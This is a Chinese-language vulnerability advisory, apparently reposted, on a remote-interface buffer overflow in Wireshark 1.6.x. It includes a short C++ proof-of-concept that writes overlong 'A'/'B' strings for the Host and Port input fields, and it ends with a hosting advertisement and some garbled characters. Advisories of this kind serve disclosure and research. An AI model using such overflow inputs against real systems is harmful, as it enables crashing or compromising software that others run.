Wireshark遠程界面緩沖區(qū)溢出漏洞

發(fā)布日期：2012-08-28
更新日期：2012-08-29

受影響系統(tǒng)：
Wireshark Wireshark 1.6.x
描述：
--------------------------------------------------------------------------------
BUGTRAQ  ID: 55211

-
 

Wireshark（前稱Ethereal）是一個網(wǎng)絡分組分析軟件。

Wireshark 1.6.0、1.8.2及其他版本在實現(xiàn)上存在緩沖區(qū)溢出漏洞，可允許遠程攻擊者在受影響應用中執(zhí)行任意代碼。

<*來源：X-h4ck
  *>

測試方法：
--------------------------------------------------------------------------------

警 告

以下程序(方法)可能帶有攻擊性，僅供安全研究與教學之用。使用者風險自負！

X-h4ck （）提供了如下測試方法：

#include <cstdio>
#include <iostream>
// wrote a little shit code to generate > nicely for u those strings
using namespace std;
int main(){

  char buff1[] = "\x41";
  char buff2[] = "\x42";
  FILE *txtfile;
  txtfile = fopen("c:\\exploit.txt", "w");
  fputs("Host Input:\n",txtfile);
  for(int i=0; i < 659; i++){
    fputs(buff1,txtfile);
    }
  fputs("\n",txtfile);
  fputs("Port Input:\n",txtfile);
  for (int y=0; y < 652; y++) {
    fputs(buff1,txtfile);
    }
  for(int x=0; x < 8; x++) {
    fputs(buff2,txtfile);
    }
  fclose(txtfile);
  return 0;
}

建議：
--------------------------------------------------------------------------------
廠商補�。�

Wireshark
---------
目前廠商還沒有提供補丁或者升級程序，我們建議使用此軟件的用戶隨時關注廠商的主頁以獲取最新版本：

服務器租用/服務器托管中國五強！虛擬主機域名注冊頂級提供商！15年品質(zhì)保障！--億恩科技[ENKJ.COM]